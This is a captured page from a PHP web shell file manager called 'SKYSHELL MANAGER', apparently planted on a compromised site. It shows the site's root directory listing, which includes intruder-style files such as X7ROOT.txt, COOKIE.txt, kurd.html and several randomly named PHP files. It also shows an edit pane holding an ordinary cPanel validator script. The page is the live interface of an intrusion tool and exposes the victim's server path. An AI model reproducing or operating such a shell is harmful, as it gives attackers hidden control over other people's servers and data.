📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: ascii-data-validators.js
/* # ascii-data-validators.js Copyright(c) 2020 cPanel, L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited */ /* --------------------------*/ /* DEFINE GLOBALS FOR LINT /*--------------------------*/ /* global define: false */ /* --------------------------*/ /** * This module is a collection of data-type validators * * @module ascii-data-validators * @requires angular, validator-utils, validate, locale */ define([ "angular", "cjt/validator/validator-utils", "cjt/util/locale", "cjt/validator/validateDirectiveFactory" ], function(angular, UTILS, LOCALE) { var validators = { /** * Validates if the input has all alphabets * * @method alpha * @param {String} val Text to validate * @return {Object} Validation result */ alpha: function(val) { var result = UTILS.initializeValidationResult(); var regExp = /^[a-zA-Z]+$/; var isValid = val !== "" ? regExp.test(val) : false; if (!isValid) { result.isValid = false; result.add("alpha", LOCALE.maketext("The value should only contain the letters [asis,a-z] and [asis,A-Z].")); return result; } return result; }, /** * Validates if the input is all upper case * * @method upperCaseOnly * @param {String} val Text to validate * @return {Object} Validation result */ upperCaseOnly: function(val) { var result = UTILS.initializeValidationResult(); var regExp = /^[A-Z]+$/; var isValid = val !== "" ? regExp.test(val) : false; if (!isValid) { result.isValid = false; result.add("upperCaseOnly", LOCALE.maketext("The value should only contain uppercase letters.")); return result; } return result; }, /** * Validates if the input is all lower case * * @method lowerCaseOnly * @param {String} val Text to validate * @return {Object} Validation result */ lowerCaseOnly: function(val) { var result = UTILS.initializeValidationResult(); var regExp = /^[a-z]+$/; var isValid = val !== "" ? regExp.test(val) : false; if (!isValid) { result.isValid = false; result.add("lowerCaseOnly", LOCALE.maketext("The value should only contain lowercase letters.")); return result; } return result; }, /** * Validates if the input is alpha numeric only * * @method alphaNumeric * @param {String} val Text to validate * @return {Object} Validation Result */ alphaNumeric: function(val) { var result = UTILS.initializeValidationResult(); var regExp = /^\w+$/; var isValid = val !== "" ? regExp.test(val) : false; if (!isValid) { result.isValid = false; result.add("alphaNumeric", LOCALE.maketext("The value should only contain alphanumeric characters.")); return result; } return result; }, /** * Validates if the input starts with the passed in pattern. * * @method startsWith * @param {String} val Text to validate * @param {String} match Text to match * @return {Object} Validation Result */ startsWith: function(val, match) { var result = UTILS.initializeValidationResult(); var regExp = new RegExp("^" + match); var isValid = val !== "" ? regExp.test(val) : false; if (!isValid) { result.isValid = false; result.add("startsWith", LOCALE.maketext("The value should start with “[_1]”.", match)); return result; } return result; }, /** * Validates if the input ends with the passed in pattern. * * @method endsWith * @param {String} val Text to validate * @param {String} match Text to match * @return {Object} Validation Result */ endsWith: function(val, match) { var result = UTILS.initializeValidationResult(); var regExp = new RegExp(match + "$"); var isValid = val !== "" ? regExp.test(val) : false; if (!isValid) { result.isValid = false; result.add("endsWith", LOCALE.maketext("The value should end with “[_1]”.", match)); return result; } return result; } }; // Generate a directive for each validation function var validatorModule = angular.module("cjt2.validate"); validatorModule.run(["validatorFactory", function(validatorFactory) { validatorFactory.generate(validators); } ]); return { methods: validators, name: "ascii-data-validators", description: "Validation library for ascii values.", version: 2.0, }; });
Save